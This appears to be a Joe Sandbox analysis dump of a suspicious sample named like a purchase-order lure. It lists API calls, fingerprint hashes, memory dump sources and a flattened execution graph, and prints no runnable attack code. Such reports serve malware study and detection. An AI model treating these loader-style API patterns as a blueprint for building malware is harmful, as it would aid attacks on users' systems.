• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
• Instruction ID: ac9472e1a6448b30edc75d30d8db5b240ac2be4fefd152415510da4d9d44e1e9
• Opcode Fuzzy Hash: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
• Instruction Fuzzy Hash: 43D05EA0EC83445EF600AAB2548263A2B98CB08350B8848E7F40247104E773E4108F5A
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E297
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E2B3
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E32A
• VariantClear.OLEAUT32(?), ref: 02B1E353
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 920484758-0
                                                                                                                                                                                                                          • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                          • Instruction ID: 5b190c14df617428032a2f44cba9ca7e7b247a1af6a815ce07d1fd8903bd5442
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E410A75A012299FCB66DB58CC94BC9B3BDEF49314F4041D5E948A7211DA34EF808FA4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                                                                          • Opcode ID: ca0e8f95d9a204321cf05a1a43cc9dbe938841dac204b9c77b1a3de21951f63c
                                                                                                                                                                                                                          • Instruction ID: d58cfe81125ad10bfdf3ba6542c7014e81ca62ecfa7c7af2931d1908ae09dd76
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca0e8f95d9a204321cf05a1a43cc9dbe938841dac204b9c77b1a3de21951f63c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB414971A012589FDB21EB68CD84BDAB7FDAB08340F9400EAE548E7245DB74AF84CF50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                                                                          • Opcode ID: 79bdac5c566b234745e3af12ccfa1e7ea3f3ddda7ed48123e5c27b4f23f493b1
                                                                                                                                                                                                                          • Instruction ID: 1074368ccee03c30cad020c43305fa14c04f6342f3ac3594c4c1881c073b42c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79bdac5c566b234745e3af12ccfa1e7ea3f3ddda7ed48123e5c27b4f23f493b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D415A71A012589FDB21EB68CD84BDAB7FDAB08340F9400E6E648E7241DB74AF84CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
                                                                                                                                                                                                                          • Instruction ID: 95a2c0ca5b1a6ae30791099c0ebec8e30aef967f8a9290670022a8f0b22fa17b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CA1F9777306040BD718AA7C9D803BDB3D6DBC5265F9882BED31DCB385EB68C9528650
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19572
                                                                                                                                                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19578
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DateFormatLocaleThread
                                                                                                                                                                                                                          • String ID: yyyy
                                                                                                                                                                                                                          • API String ID: 3303714858-3145165042
                                                                                                                                                                                                                          • Opcode ID: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
                                                                                                                                                                                                                          • Instruction ID: 8676353fc7cd72329d1871b5d1e38ff6baba3b5ab980d0207943815eea3dd7c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2217C71A006989FDB10DFA8C891AAEB7B9EF09700F9104E5E905E7251DB30DE40CBA5
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: HandleModule$AddressProc$CacheFlushInstruction
• String ID: FlushInstructionCache$Kernel32
• API String ID: 3811539418-184458249
• Opcode ID: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
• Instruction ID: 616b8a28569c6041a2362061019d9ee7c4397ed36f089c6be7e56f977986e096
• Opcode Fuzzy Hash: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
• Instruction Fuzzy Hash: F2016DB1654304AFEB00EFA4DD41F5A77EDE708B40FA184A0F908D7650DA74AD159A29
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AF58
• IsBadWritePtr.KERNEL32(?,00000004), ref: 02B2AF88
• IsBadReadPtr.KERNEL32(?,00000008), ref: 02B2AFA7
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AFB3
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Read$Write
• String ID:
• API String ID: 3448952669-0
• Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
• Instruction ID: 3db4d0fc2c1fb154ba514444d524e1075af158aa2dd4818251ed6f8d859da57b
• Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
• Instruction Fuzzy Hash: EC2184B264072A9BDB10DF69CCC0BAE77A9EF44351F004591FD18D7384E738E9158AA4

Execution Graph

Execution Coverage: 3.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.6%
Total number of Nodes: 1242
Total number of Limit Nodes: 27
13308 41452e 13306->13308 13307->13304 13310 4144d4 13307->13310 13318 40b6b5 ___endstdio 62 API calls 13307->13318 13311 40b6b5 ___endstdio 62 API calls 13308->13311 13312 4144f5 13310->13312 13322 40b6b5 ___endstdio 62 API calls 13310->13322 13314 414541 13311->13314 13315 40b6b5 ___endstdio 62 API calls 13312->13315 13321 40b6b5 ___endstdio 62 API calls 13314->13321 13324 414502 13315->13324 13316 4145c6 13319 40b6b5 ___endstdio 62 API calls 13316->13319 13317 40b6b5 ___endstdio 62 API calls 13317->13323 13320 4144c9 13318->13320 13325 4145cc 13319->13325 13333 417841 13320->13333 13327 41454f 13321->13327 13328 4144ea 13322->13328 13323->13316 13329 40b6b5 62 API calls ___endstdio 13323->13329 13330 40b6b5 ___endstdio 62 API calls 13324->13330 13325->13285 13331 40b6b5 ___endstdio 62 API calls 13327->13331 13349 4177fc 13328->13349 13329->13323 13330->13304 13331->13305 13334 4178cb 13333->13334 13335 41784e 13333->13335 13334->13310 13336 41785f 13335->13336 13337 40b6b5 ___endstdio 62 API calls 13335->13337 13338 417871 13336->13338 13339 40b6b5 ___endstdio 62 API calls 13336->13339 13337->13336 13340 417883 13338->13340 13341 40b6b5 ___endstdio 62 API calls 13338->13341 13339->13338 13342 417895 13340->13342 13344 40b6b5 ___endstdio 62 API calls 13340->13344 13341->13340 13343 4178a7 13342->13343 13345 40b6b5 ___endstdio 62 API calls 13342->13345 13346 4178b9 13343->13346 13347 40b6b5 ___endstdio 62 API calls 13343->13347 13344->13342 13345->13343 13346->13334 13348 40b6b5 ___endstdio 62 API calls 13346->13348 13347->13346 13348->13334 13350 417809 13349->13350 13356 41783d 13349->13356 13351 417819 13350->13351 13352 40b6b5 ___endstdio 62 API calls 13350->13352 13353 41782b 13351->13353 13354 40b6b5 ___endstdio 62 API calls 13351->13354 13352->13351 13355 40b6b5 ___endstdio 62 API calls 13353->13355 13353->13356 13354->13353 13355->13356 13356->13312 13358 41457a 13357->13358 13359 417678 13357->13359 13358->13317 13360 40b6b5 ___endstdio 62 API calls 
13359->13360 13361 417680 13360->13361 13362 40b6b5 ___endstdio 62 API calls 13361->13362 13363 417688 13362->13363 13364 40b6b5 ___endstdio 62 API calls 13363->13364 13365 417690 13364->13365 13366 40b6b5 ___endstdio 62 API calls 13365->13366 13367 417698 13366->13367 13368 40b6b5 ___endstdio 62 API calls 13367->13368 13369 4176a0 13368->13369 13370 40b6b5 ___endstdio 62 API calls 13369->13370 13371 4176a8 13370->13371 13372 40b6b5 ___endstdio 62 API calls 13371->13372 13373 4176af 13372->13373 13374 40b6b5 ___endstdio 62 API calls 13373->13374 13375 4176b7 13374->13375 13376 40b6b5 ___endstdio 62 API calls 13375->13376 13377 4176bf 13376->13377 13378 40b6b5 ___endstdio 62 API calls 13377->13378 13379 4176c7 13378->13379 13380 40b6b5 ___endstdio 62 API calls 13379->13380 13381 4176cf 13380->13381 13382 40b6b5 ___endstdio 62 API calls 13381->13382 13383 4176d7 13382->13383 13384 40b6b5 ___endstdio 62 API calls 13383->13384 13385 4176df 13384->13385 13386 40b6b5 ___endstdio 62 API calls 13385->13386 13387 4176e7 13386->13387 13388 40b6b5 ___endstdio 62 API calls 13387->13388 13389 4176ef 13388->13389 13390 40b6b5 ___endstdio 62 API calls 13389->13390 13391 4176f7 13390->13391 13392 40b6b5 ___endstdio 62 API calls 13391->13392 13393 417702 13392->13393 13394 40b6b5 ___endstdio 62 API calls 13393->13394 13395 41770a 13394->13395 13396 40b6b5 ___endstdio 62 API calls 13395->13396 13397 417712 13396->13397 13398 40b6b5 ___endstdio 62 API calls 13397->13398 13399 41771a 13398->13399 13400 40b6b5 ___endstdio 62 API calls 13399->13400 13401 417722 13400->13401 13402 40b6b5 ___endstdio 62 API calls 13401->13402 13403 41772a 13402->13403 13404 40b6b5 ___endstdio 62 API calls 13403->13404 13405 417732 13404->13405 13406 40b6b5 ___endstdio 62 API calls 13405->13406 13407 41773a 13406->13407 13408 40b6b5 ___endstdio 62 API calls 13407->13408 13409 417742 13408->13409 13410 40b6b5 ___endstdio 62 API calls 13409->13410 13411 41774a 13410->13411 13412 40b6b5 ___endstdio 62 API 
calls 13411->13412 13413 417752 13412->13413 13414 40b6b5 ___endstdio 62 API calls 13413->13414 13415 41775a 13414->13415 13416 40b6b5 ___endstdio 62 API calls 13415->13416 13417 417762 13416->13417 13418 40b6b5 ___endstdio 62 API calls 13417->13418 13419 41776a 13418->13419 13420 40b6b5 ___endstdio 62 API calls 13419->13420 13421 417772 13420->13421 13422 40b6b5 ___endstdio 62 API calls 13421->13422 13423 41777a 13422->13423 13424 40b6b5 ___endstdio 62 API calls 13423->13424 13425 417788 13424->13425 13426 40b6b5 ___endstdio 62 API calls 13425->13426 13427 417793 13426->13427 13428 40b6b5 ___endstdio 62 API calls 13427->13428 13429 41779e 13428->13429 13430 40b6b5 ___endstdio 62 API calls 13429->13430 13431 4177a9 13430->13431 13432 40b6b5 ___endstdio 62 API calls 13431->13432 13433 4177b4 13432->13433 13434 40b6b5 ___endstdio 62 API calls 13433->13434 13435 4177bf 13434->13435 13436 40b6b5 ___endstdio 62 API calls 13435->13436 13437 4177ca 13436->13437 13438 40b6b5 ___endstdio 62 API calls 13437->13438 13439 4177d5 13438->13439 13440 40b6b5 ___endstdio 62 API calls 13439->13440 13441 4177e0 13440->13441 13442 40b6b5 ___endstdio 62 API calls 13441->13442 13443 4177eb 13442->13443 13444 40b6b5 ___endstdio 62 API calls 13443->13444 13444->13358 13445->13288 13448 413e6d _memset 13446->13448 13455 413f1f 13446->13455 13456 417625 13448->13456 13450 40ce09 __atodbl_l 5 API calls 13452 413fca 13450->13452 13452->13247 13454 417426 ___crtLCMapStringA 97 API calls 13454->13455 13455->13450 13457 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13456->13457 13458 417638 13457->13458 13466 41746b 13458->13466 13461 417426 13462 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13461->13462 13463 417439 13462->13463 13532 417081 13463->13532 13467 4174b7 13466->13467 13468 41748c GetStringTypeW 13466->13468 13469 4174a4 13467->13469 13471 41759e 13467->13471 13468->13469 13470 4174ac GetLastError 13468->13470 13472 4174f0 MultiByteToWideChar 13469->13472 13489 417598 
13469->13489 13470->13467 13494 417a20 GetLocaleInfoA 13471->13494 13479 41751d 13472->13479 13472->13489 13474 40ce09 __atodbl_l 5 API calls 13476 413eda 13474->13476 13476->13461 13477 4175ef GetStringTypeA 13482 41760a 13477->13482 13477->13489 13478 417532 _memset __crtCompareStringA_stat 13481 41756b MultiByteToWideChar 13478->13481 13478->13489 13479->13478 13483 40b84d _malloc 62 API calls 13479->13483 13485 417581 GetStringTypeW 13481->13485 13486 417592 13481->13486 13487 40b6b5 ___endstdio 62 API calls 13482->13487 13483->13478 13485->13486 13490 4147ae 13486->13490 13487->13489 13489->13474 13491 4147ba 13490->13491 13492 4147cb 13490->13492 13491->13492 13493 40b6b5 ___endstdio 62 API calls 13491->13493 13492->13489 13493->13492 13495 417a53 13494->13495 13496 417a4e 13494->13496 13525 416f54 13495->13525 13498 40ce09 __atodbl_l 5 API calls 13496->13498 13499 4175c2 13498->13499 13499->13477 13499->13489 13500 417a69 13499->13500 13501 417aa9 GetCPInfo 13500->13501 13505 417b33 13500->13505 13502 417ac0 13501->13502 13503 417b1e MultiByteToWideChar 13501->13503 13502->13503 13506 417ac6 GetCPInfo 13502->13506 13503->13505 13509 417ad9 _strlen 13503->13509 13504 40ce09 __atodbl_l 5 API calls 13507 4175e3 13504->13507 13505->13504 13506->13503 13508 417ad3 13506->13508 13507->13477 13507->13489 13508->13503 13508->13509 13510 40b84d _malloc 62 API calls 13509->13510 13514 417b0b _memset __crtCompareStringA_stat 13509->13514 13510->13514 13511 417b68 MultiByteToWideChar 13512 417b80 13511->13512 13513 417b9f 13511->13513 13516 417ba4 13512->13516 13517 417b87 WideCharToMultiByte 13512->13517 13515 4147ae __freea 62 API calls 13513->13515 13514->13505 13514->13511 13515->13505 13518 417bc3 13516->13518 13519 417baf WideCharToMultiByte 13516->13519 13517->13513 13520 411cba __calloc_crt 62 API calls 13518->13520 13519->13513 13519->13518 13521 417bcb 13520->13521 13521->13513 13522 417bd4 WideCharToMultiByte 13521->13522 13522->13513 13523 417be6 
13522->13523 13524 40b6b5 ___endstdio 62 API calls 13523->13524 13524->13513 13528 41a354 13525->13528 13529 41a36d 13528->13529 13530 41a125 strtoxl 86 API calls 13529->13530 13531 416f65 13530->13531 13531->13496 13533 4170a2 LCMapStringW 13532->13533 13537 4170bd 13532->13537 13534 4170c5 GetLastError 13533->13534 13533->13537 13534->13537 13535 4172bb 13539 417a20 ___ansicp 86 API calls 13535->13539 13536 417117 13538 417130 MultiByteToWideChar 13536->13538 13560 4172b2 13536->13560 13537->13535 13537->13536 13547 41715d 13538->13547 13538->13560 13541 4172e3 13539->13541 13540 40ce09 __atodbl_l 5 API calls 13542 413efa 13540->13542 13543 4173d7 LCMapStringA 13541->13543 13544 4172fc 13541->13544 13541->13560 13542->13454 13578 417333 13543->13578 13545 417a69 ___convertcp 69 API calls 13544->13545 13549 41730e 13545->13549 13546 4171ae MultiByteToWideChar 13550 4171c7 LCMapStringW 13546->13550 13572 4172a9 13546->13572 13548 40b84d _malloc 62 API calls 13547->13548 13556 417176 __crtCompareStringA_stat 13547->13556 13548->13556 13552 417318 LCMapStringA 13549->13552 13549->13560 13554 4171e8 13550->13554 13550->13572 13551 4173fe 13558 40b6b5 ___endstdio 62 API calls 13551->13558 13551->13560 13563 41733a 13552->13563 13552->13578 13553 4147ae __freea 62 API calls 13553->13560 13557 4171f1 13554->13557 13562 41721a 13554->13562 13555 40b6b5 ___endstdio 62 API calls 13555->13551 13556->13546 13556->13560 13561 417203 LCMapStringW 13557->13561 13557->13572 13558->13560 13559 417235 __crtCompareStringA_stat 13564 417269 LCMapStringW 13559->13564 13559->13572 13560->13540 13561->13572 13562->13559 13566 40b84d _malloc 62 API calls 13562->13566 13565 41734b _memset __crtCompareStringA_stat 13563->13565 13567 40b84d _malloc 62 API calls 13563->13567 13568 417281 WideCharToMultiByte 13564->13568 13569 4172a3 13564->13569 13571 417389 LCMapStringA 13565->13571 13565->13578 13566->13559 13567->13565 13568->13569 13570 4147ae __freea 62 API calls 13569->13570 
13570->13572 13573 4173a5 13571->13573 13574 4173a9 13571->13574 13572->13553 13577 4147ae __freea 62 API calls 13573->13577 13576 417a69 ___convertcp 69 API calls 13574->13576 13576->13573 13577->13578 13578->13551 13578->13555 13579->13250 13581 41358c 13580->13581 13582 41046e __encode_pointer 6 API calls 13581->13582 13583 4135a4 13581->13583 13582->13581 13583->12708 13587 40d281 13584->13587 13586 40d2ca 13586->12710 13588 40d28d _doexit 13587->13588 13595 40e806 13588->13595 13594 40d2ae _doexit 13594->13586 13596 40d6e0 __lock 62 API calls 13595->13596 13597 40d292 13596->13597 13598 40d196 13597->13598 13599 4104e9 __decode_pointer 6 API calls 13598->13599 13600 40d1aa 13599->13600 13601 4104e9 __decode_pointer 6 API calls 13600->13601 13602 40d1ba 13601->13602 13610 40d23d 13602->13610 13618 40e56a 13602->13618 13604 41046e __encode_pointer 6 API calls 13605 40d232 13604->13605 13607 41046e __encode_pointer 6 API calls 13605->13607 13606 40d1d8 13609 40d1fc 13606->13609 13614 40d224 13606->13614 13631 411d06 13606->13631 13607->13610 13609->13610 13611 411d06 __realloc_crt 72 API calls 13609->13611 13612 40d212 13609->13612 13615 40d2b7 13610->13615 13611->13612 13612->13610 13613 41046e __encode_pointer 6 API calls 13612->13613 13613->13614 13614->13604 13680 40e80f 13615->13680 13619 40e576 _doexit 13618->13619 13620 40e5a3 13619->13620 13621 40e586 13619->13621 13623 40e5e4 HeapSize 13620->13623 13625 40d6e0 __lock 62 API calls 13620->13625 13622 40bfc1 __controlfp_s 62 API calls 13621->13622 13624 40e58b 13622->13624 13628 40e59b _doexit 13623->13628 13626 40e744 __controlfp_s 6 API calls 13624->13626 13627 40e5b3 ___sbh_find_block 13625->13627 13626->13628 13636 40e604 13627->13636 13628->13606 13635 411d0f 13631->13635 13633 411d4e 13633->13609 13634 411d2f Sleep 13634->13635 13635->13633 13635->13634 13640 40e34f 13635->13640 13639 40d606 LeaveCriticalSection 13636->13639 13638 40e5df 13638->13623 13638->13628 13639->13638 13641 40e35b _doexit 
13640->13641 13642 40e370 13641->13642 13643 40e362 13641->13643 13645 40e383 13642->13645 13646 40e377 13642->13646 13644 40b84d _malloc 62 API calls 13643->13644 13665 40e36a __dosmaperr _doexit 13644->13665 13653 40e4f5 13645->13653 13668 40e390 _memcpy_s ___sbh_resize_block ___sbh_find_block 13645->13668 13647 40b6b5 ___endstdio 62 API calls 13646->13647 13647->13665 13648 40e528 13649 40d2e3 __calloc_impl 6 API calls 13648->13649 13652 40e52e 13649->13652 13650 40d6e0 __lock 62 API calls 13650->13668 13651 40e4fa HeapReAlloc 13651->13653 13651->13665 13654 40bfc1 __controlfp_s 62 API calls 13652->13654 13653->13648 13653->13651 13655 40e54c 13653->13655 13656 40d2e3 __calloc_impl 6 API calls 13653->13656 13659 40e542 13653->13659 13654->13665 13657 40bfc1 __controlfp_s 62 API calls 13655->13657 13655->13665 13656->13653 13660 40e555 GetLastError 13657->13660 13661 40bfc1 __controlfp_s 62 API calls 13659->13661 13660->13665 13674 40e4c3 13661->13674 13662 40e41b HeapAlloc 13662->13668 13663 40e470 HeapReAlloc 13663->13668 13664 40e4c8 GetLastError 13664->13665 13665->13635 13666 40def2 ___sbh_alloc_block 5 API calls 13666->13668 13667 40e4db 13667->13665 13670 40bfc1 __controlfp_s 62 API calls 13667->13670 13668->13648 13668->13650 13668->13662 13668->13663 13668->13665 13668->13666 13668->13667 13669 40d2e3 __calloc_impl 6 API calls 13668->13669 13672 40e4be 13668->13672 13675 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 13668->13675 13676 40e493 13668->13676 13669->13668 13671 40e4e8 13670->13671 13671->13660 13671->13665 13673 40bfc1 __controlfp_s 62 API calls 13672->13673 13673->13674 13674->13664 13674->13665 13675->13668 13679 40d606 LeaveCriticalSection 13676->13679 13678 40e49a 13678->13668 13679->13678 13683 40d606 LeaveCriticalSection 13680->13683 13682 40d2bc 13682->13594 13683->13682 13687 40b9aa _doexit _strnlen 13684->13687 13685 40b9b8 13686 40bfc1 __controlfp_s 62 API calls 13685->13686 13688 40b9bd 13686->13688 
